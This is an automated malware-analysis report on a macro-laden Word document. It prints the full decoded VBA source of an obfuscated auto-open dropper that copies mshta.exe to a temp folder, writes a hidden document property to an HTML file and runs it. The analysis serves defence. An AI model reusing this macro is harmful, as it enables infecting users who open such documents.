Verdict: MALICIOUS
Risk Score: 138
Heuristics: 6
- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Call CreateObject("ws" + aZkYAJ + "ell").run(ayH6r)`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Environ() call, env variable access (low, OLE_VBA_ENVIRON). Matched line in script: `ayPJL = Environ(aojfL)`
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL label for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2016/ink (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2018/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/ (in document text: OOXML body / shared strings)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text: OOXML body / shared strings)
  - http://purl.org/dc/elements/1.1/ (in document text: OOXML body / shared strings)
  - http://ns.adobe.com/photoshop/1.0/ (in document text: OOXML body / shared strings)
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15833 bytes | edaf28c800991fe7fa669e4286da8888a73672f65519dd67fb787c6c8dc00327 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aRX2s"
Sub AutoOpen()
' Polygamy programming incognito
aET2r
End Sub
Attribute VB_Name = "aEgw5"
Public Const aumx2 As String = ""
Public Const a0Yne As Integer = -240 + 253
Public Const aQ7VJg As String = "1ridn1iw1"
Public Const aSEWd As String = "231met1sys1"
Public Const afB16 As String = "p1m1e1t"
Public Const aZkYAJ As String = "cript.sh"
Function abnZx()
End Function
Sub afloa(aM1lJT)
' Transit composition
' Mashed racket fu spotlight spice
' Receives syria punk magnolia listless unearthly
' Itself
' Baby kinship gradually
' Suspension smoldering jacky voltaic horizontal journalism helpful
' Christine pop
' Syracuse cos lie
' Lease oust
' Holler cherokee unwrap
' Sheen
' Retract undeniable
' Witch pro amazingly wicker
' Cp oe wr
' Weasel prefect
' Remembered hoe stuck buxom graduate
' Prosy biol
' Consciousness contiguous disquiet ana compare hostage john
' Domains pumps
' Catherine drawings crops decomposition transcendental cleaner quartet
' Ag benedict gnu confused
' Mop
' Flat katharine abominably equator
' Flemish racks convertible diet
' Barcelona capitol
' Than scoff hydrocodone anchorage
' Gage
' Eating grain veined abstract cubit
' Blunderbuss purse mumbai inc.
' Twice merit downloading hoot
' Esthetic betake
' Occupancy crown yesterday passable
' Disclaimers communities priority intangible rentals
' Mysticism netherlands recommendation
' Conciliatory definitive
' Fashion turbulence fioricet difficult porphyry reprobate
' Chapman besiege
' Disagree decorative solutions
' Swoon
' Neigh peaked aspirant metro amino
' Cobweb bridesmaid scientist
' Cup blink pest
' Omissions spoonfuls
' Woeful hilarious red-hot
' Farcical hasan champagne
' Avon package swede
' Reggie string looped planning
' Unanimity
' Scottish shovel
' Physically postscript hot
' Apr canyon trickle
' Beverages leech scandinavia equator
' Swivel european light replacing flemish
' Gashed 911 amassed memphis
' Slavish penury bloodhound updating tricks
' Phys greyhound swamped
' Warcraft movies
' Satrap pheasant illustrator finery
' Idol il
' Tones
' Magisterial knell bored coax
' Then
' Inbox
' Wordy botany trace
' Urbanity hindu brescia
' Newbie marina revel
' Currency convinced
End Sub
Function aeJKQF(at2kAV)
aeJKQF = ActiveDocument.BuiltInDocumentProperties(at2kAV)
End Function
Public Sub a4foe()
aDoMr
End Sub
Public Sub a2yQM()
' Purchase christie ion
' Cho initiate
' Outdoors maltese bubbles justice
' Apr stratum
' Kilometers accessions legs
' Deduce revelation knell
' Login service adjunct drunk guinea dent
' Mammy humbug
' Richards romeo christian
' Lady nancy farms sphere
' Rocker miscarriage craters advisers
a61Nk5
End Sub
Attribute VB_Name = "a0lvJ"
Public Function aNOmzL(a6DXG, adhZw)
' Fittest
' Capacity uncover
' Constitutes lunar buzzing stubble
' Reproduce lexus rn dodge
' Grande rocket ask stand egress
' Choice brokers accompanied comic contrasting depleted
' Absences go-between untried
' Epidemics tributaries educator committee dave tally
' Adage drawings afghan paris
' Detriment mediawiki oe vast
' Dote on
' Belated pests tripadvisor
' Nascent cigarettes wayfarer
' Embedded erst sectarian
' Regency papua
' Laws achieved watching
' Breakdown asn eph. k fiji leash uphold
' Revealed manhattan formerly
' Pushing costa
' Gadgets staffordshire beet revolting
' Mozilla banjo advantages relay
' Killed co josh starboard
' Attributes expired ephesians algorithms inches
' Occupation discourage residue
' Intellectually cnet technological abbreviations hero
' Ephemeral ebony rigorous
' Films guess
' Tilt jaundice
' Honduras dwelling-place
' Zdnet
' Pixel
' Proficiency interrogate chancery prescription satellite bonds
' Dreams research conjugal loin
' Republican stamp tribune millinery
' Tee russet
' Pricing abstemious attending
' Votive
' Fuji depose muscles jungle
' Cask portsmouth trades ocr bicycle
' Learner immigrants fullness abdominal services blues
' Necklace doe shirts revelation
' Balanced tools shaped compromise
' Hertfordshire dab
' Unutterable claret gem
' Funding spouting dugout
' Prevent folks
' Linguist scan im- tidy
' Threesome elementary chris flu
' Occasionally emigrant
' Spokesman closer hexameter sees expedite
' Papyrus confounding
' Pregnancy
' Chemist february juicy
' Injection
' Render japanese contracting
' Local did
' Apse precept
' Ta flyer shows applicant
' Beverly stranger feud spellbound
' Gulf
' Metres dame forum
' Unrequited larynx kilometers hammock
' Longer wherever authorize exceptionally impassive which
' Droll radar delirious eliminate tulip
' Mediterranean without upholstery tacked voted burmese tomatoes outside
FileNumber = FreeFile
Open a6DXG For Output As #FileNumber
' Love-making Word
' Recorder teas byte samaria
' Why dappled
' Interpretation maybe amaryllis wi cage provisions
' Tickets seraphic stopping aj passover
' Interstate pot autocrat apoplexy peers cricket
' Bloggers let
' Portraiture fervour
' Topeka barnet jurist costa target
' Wicker evaluated permits starred
' Consisting dagon vestal crosswise relocation martha
' Breakfast steam
' Screening
' Ant housewares opiate suggest thread
' Tips blots baden conservation installation
' Motherless transgression instantaneously imitator guts capitol
' Grounded
' Violation workers lichen socialism
' Bristling
' Amazing baker edification
' Extend palmy dj qualified
Print #FileNumber, adhZw
Close #FileNumber
End Function
Sub aAFhs(aBJIDU, aXyqC)
' Uptown speaking
' Beaker scripts
' Puerto capstan implicit ronald
FileCopy aBJIDU, aXyqC
End Sub
Function aQN9v(and4c)
' Gibraltar authorization champions terrestrial
' Anderson coupled plantain
' Suckling sophie distended
' Hc surprised funding
' Drawbridge twaddle slum
' Akimbo killing looped pushing
' Pali atrocity
' Ba piecemeal fiction amelioration vcr
' Newer commodities exhort comm
' Partiality gnu cancelled fusillade proceedings
aQN9v = and4c
End Function
Function aZqytn(and4c) As String
Dim azT7fq As Long
Dim aDuHxW As Integer
Dim asJcM As Integer
For azT7fq = 1 To Len(and4c)
asJcM = 0
' Charts mineral augmentation pathology shooting
' Gives optional ultra specially dom
' Untamed
' Probabilities swoon slink
' Knocker
' Attest competitor comprise characterized
' Bunting
' Disapprove stroke
' Punjab huntsman
' Lover belly slush doggerel
' Flare utrecht brick hole physiology
aERlV = Mid(and4c, azT7fq, 1)
' Cloven jun fervour composition imo
aDuHxW = Asc(aERlV)
If (aDuHxW > a7Rswn(27181 - 27180) And aDuHxW < a7Rswn(11722 - 11720)) Or (aDuHxW > a7Rswn(19986 / 6662) And aDuHxW < a7Rswn(6485 - 6481)) Then
' Flutes ceremony social gazette asked
' Sciences corsica tin pointed minor
' Detailed mural lief
' Locations scuba
' Ip trainers
' Upcoming program absented cramps carboniferous carol
' Volume encryption da
' Sedentary onto belittle georgia seedling winnings
' Beings inlet bolster
' Wring 411 energy ppm underground kerosene
' Bibliographic pisa messaging
asJcM = a0Yne
aDuHxW = aOw5UE(aDuHxW, asJcM)
If aDuHxW < a7Rswn(5) And aDuHxW > 83 Then
aDuHxW = a1yEx(aDuHxW)
ElseIf aDuHxW < -326 + 391 Then
aDuHxW = a1yEx(aDuHxW)
End If
End If
' Totally cook manchu
aJ8wWs = armLbO(aDuHxW)
Mid$(and4c, azT7fq, 1) = aQN9v(aJ8wWs)
Next azT7fq
aZqytn = and4c
End Function
Attribute VB_Name = "ajA1T"
Function azO7g(auhTUt)
' Currencies ages coverage gras dim
aIEbg = auhTUt
aQNmW = Len(aIEbg)
For ayCqf = 0 To aQNmW - 1
' Read sepulchral java untenable
acKUh = acKUh & Mid(aIEbg, (aQNmW - ayCqf), 1)
Next ayCqf
azO7g = acKUh
End Function
Public Function abJ7CM(a9ecu1)
' Steppe artless epirus mangy peterborough
' Cultural controller sedan
' Spoonfuls sheila boomed
' Floyd freight clinics
' Xxx lynn repository
' Bazaar
' Freud candied
' Terse bound
' Tuneful educated townspeople utc proportion
' Baseball laud
' Belong pallet laziness capitol shortening
abJ7CM = Replace(a9ecu1, aumx2, "")
End Function
Sub aET2r()
' Despotic nag mac carp
' Arbitration
a4foe
' Bonnie collegiate demonstrate semicircle broker
' Advisory vatican fl
' Arrested nipple
' Tahoe unabated
' Transmigration
' Chi
' Hard-headed fist excommunication
' Leniency remaining
' Forefront holly durable hark
' Concepts barcelona silent
' Darken backwoods wa streams
a2yQM
Call CreateObject("ws" + aZkYAJ + "ell").run(ayH6r)
End Sub
Attribute VB_Name = "aEHX8"
Function ayPJL(aojfL)
ayPJL = Environ(aojfL)
End Function
Function anJrh()
' Xxx k functional
' Advisory promotions liberia astronomy
' Phoenix surname persevere drought
' Principal cinder
' Licking represented declamation psyche overnight
' Dem sensitive knoll
' Ton dour clammy impossible mens
' Subject-matter
' Wedge
' Unmanned
' Ds queens payday aide
' Cameo tacitly unconcern trusts accented
' Ion metaphysics
' Outlay daytime risky
' Nevada
' Treasurer
' Restrict turret transgressed lullaby
' Companion sikkim depress bunting dissent pigtail benefice ryan
' Revert titania anniversary endanger
' Nato travelling
' Hamper
' Sustainability brandon
With Application
anJrh = .PathSeparator
End With
End Function
Function a05yc(ad32K)
' Lodges euripides wash mohammedan rueful
' Handcuffs axis syllogism sharon
' Worldwide niger commissions opinions
' Dividend gesticulation shoal abased big
' Second corporation omniscient mauve
' Quill err fucking genealogy
' Ply premium ooze
' Joyce dispel nicaragua copied
' Match canticle eclipse aruba emotions veneer
' Outdo bruges dennis
' Terrify kenny
a5ibN = VBA.Split(azO7g("lmth.ni|moc.ni|exe.athsm"), "|")
' Bird vita
' Valentine aver bewitch namely genealogy
' Promotes
' Postal narcissist
' Contagious brave lo rev riley
' Tally redoubtable ao offer
' Quince verbs pubs welter
' Homestead co conclusion
' Libraries subjective chamber passive pointing intellectual
' Disembark apes
' Crank clamor gram
' Chelsea corfu uncertainty
' Lo unemployed disclaimer
' Capitulation locomotive que
' Allergy
' Belong sedge
' Lightning happen
' Hills active lebanon burdensome spears
' Incompetent poop gut webshots pease curving
' Ships gays
' Ed
' Chatty ricky undefined romance stench
' Optical municipality
' Secure deafness urgent
' Parcel after waning edification paragon advisory
' Desired tripadvisor ahoy cast consumptive interpolation
' Pup enemy font
' Bow vegetation
' Collects diphtheria documentary
' By
' Sunglasses newcastle components
' Stat shrivel cb
' Ofries republic denmark cobweb initiation
' Conrad esperanto reflex reality
' Chicks deranged
' Verity debonair prev
' Invention disband carlos
' Invert obtaining numerous castaway
' Merry tanks bluntly ecommerce ccc formula
' Heifer reduction fibre dormant
' Bevis rom scapegrace
' Perfectly insights gasoline worlds traditionally
' Themes balustrade stones hawaiian
' Constantly fiji
Select Case ad32K
' Codes tart dem sill serb jo.
' Provinces ferrara gull lithuania aquiline boxed
' Surfing aerial enunciation
' Fw candor compost
' Establish unwrap
' Blow
' Variability nominations availability frivolity
' Untruth retinue despondency
' Asian loch ducal lies modifies
' Occult rachel less
' Lease sully embody customers servitor
Case 0:
a05yc = ayPJL(Replace(azO7g(aQ7VJg), "1", "")) & anJrh & Replace(azO7g(aSEWd), "1", "") & anJrh & a5ibN(0)
' Lint epithet
' Fetching drilling burrow entrust colombo pace
' Transmigration possibilities distrustful dropsy
' Elope intensive objectionable registration
' Sophie
' Upturned fy differential diabetes
' Expires louisiana
' Cite
' Lorenz lug
' Brain piano frontispiece erik peas
' Spiritual bilateral refinance baptised promo magenta
' Safely concurrent
' Telecharger
' Shown ntsc apnic secrete
' Spain soundtrack
' Cells damages
' Risk accountant
' Pop lawsuit glutton courses
' Exploring ky
' Capabilities boss paleness provencal sexual occupant
' Ep counsel notifications obadiah tourism
' Durance
Case 1:
' Telegraphic undaunted prepared seeking nicole ff
' Watchman warm-hearted leaving
' Sufficiency
' Operational dissimilarity recommends bean far-fetched
' Prehistoric ram encounter
' Listing grasshopper incredulous right documented
' Saturn branch octavo
' Orbit careworn visual mar prune
' Honors ballet per
' Abounded riley herbal
' Greenery buffeted exalting
a05yc = ayPJL(Replace(azO7g(afB16), "1", "")) & anJrh & a5ibN(1)
' Damnable
' Retrace thesaurus kitty compliant musty
' Derived oc
' Erik
' Approach bombard expence montgomery base denounce
' Soliloquy baroness complications distillation
' Beans bbc presuppose increasingly gram
' Uc schema
' Disability contest legends
' Bandage viewpoint pears
' Billow
' Gloat recalcitrant evident
' 12mo limousines veterans mammoth antigua
' Routing security espionage
' Manufactured with toilsome prescribed
' Agate
' Capita lc
' Bass mathematician
' Gent phosphorescent
' Breaking higher passive whatll constructed dont adjutant
' Reuters taboo seem breach fifty simultaneously
' Consequences mars pubmed
Case 2:
' Tumultuously psychic intro
' Sn move basename farm
' Jack parvenu vanguard citizens african
' Saline enhance accurately crater
' Upset apt cuckoo priceless flags
' Tardily hogshead
' Sturgeon master applying
' Kingdom morass revised cavalcade impetus
' Bluntly palette aroma dreamer im cowper mutation
' Hera nuclear cooperative ra magnet
a05yc = ayPJL(Replace(azO7g(afB16), "1", "")) & anJrh & a5ibN(2)
End Select
End Function
Sub a61Nk5()
aVOEx = ajCxS(a05yc(2))
aNOmzL aVOEx, aZqytn(aeJKQF("category"))
End Sub
Attribute VB_Name = "aRCvq"
Function asNOEC(ahO3QY)
asNOEC = (abJ7CM(ahO3QY))
End Function
Function aIb9Ch(aNazx)
' Eastern generates linda configuration presented
' Prowl ceramic pyramids rover
' Accessed raven
' Graduate toolbar pharmacies competing
' Tinsel domesticated favorably
' Interstate consist veda casinos
' Ellen sexuality
' Guards administered oppressor fold
' Mesopotamia carbolic
' Reprimand wedding
' Somewhat exodus amulet
' Harmony sycamore apnic printer lite
' Businesses keyboard
' Meaningful scow qualm footstep poll -oid
' Variable bubble organizer paul
' Whales eye-witness
' Indicator shatter austin aberration redundant power
' Louse potassium plots ebony
' Forsook abdul delivered
' Portfolio ignominious trade replies
' Worship hoot
' Remainder
aIb9Ch = (abJ7CM(aNazx))
End Function
Function ajCxS(aaLgt)
' Stab annotation vin mixture scissors harps
ajCxS = (abJ7CM(aaLgt))
End Function
Function ayH6r()
asK7Gf = aIb9Ch(a05yc(1))
aJ2cy = ajCxS(a05yc(2))
ayH6r = asK7Gf & " " & aJ2cy
End Function
Attribute VB_Name = "aNFrp6"
Sub aDoMr()
amXSNx = asNOEC(a05yc(0))
a4U2Pq = aIb9Ch(a05yc(1))
aAFhs amXSNx, a4U2Pq
End Sub
Function a1yEx(apOSo)
a1yEx = apOSo + 5434 / 209
End Function
Function a7Rswn(aHBKLv)
If aHBKLv = 0 Then
a7Rswn = 25033 - 25032
ElseIf aHBKLv = 1 Then
a7Rswn = 21632 / 338
ElseIf aHBKLv = 2 Then
a7Rswn = 35 + 56
ElseIf aHBKLv = 3 Then
a7Rswn = 12 * 8
ElseIf aHBKLv = 4 Then
a7Rswn = 87 + 36
ElseIf aHBKLv = 5 Then
a7Rswn = 257 - 160
Else
a7Rswn = 24576 / 24
End If
End Function
Function aOw5UE(apOSo, aRV8Cr)
aOw5UE = apOSo - aRV8Cr
End Function
Function armLbO(apOSo)
armLbO = VBA.ChrW(apOSo)
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 59392 bytes | 02041e5385ee4a3397fc5e0fa4ff8e7d92cdb06412c5508127d52101c781eeac |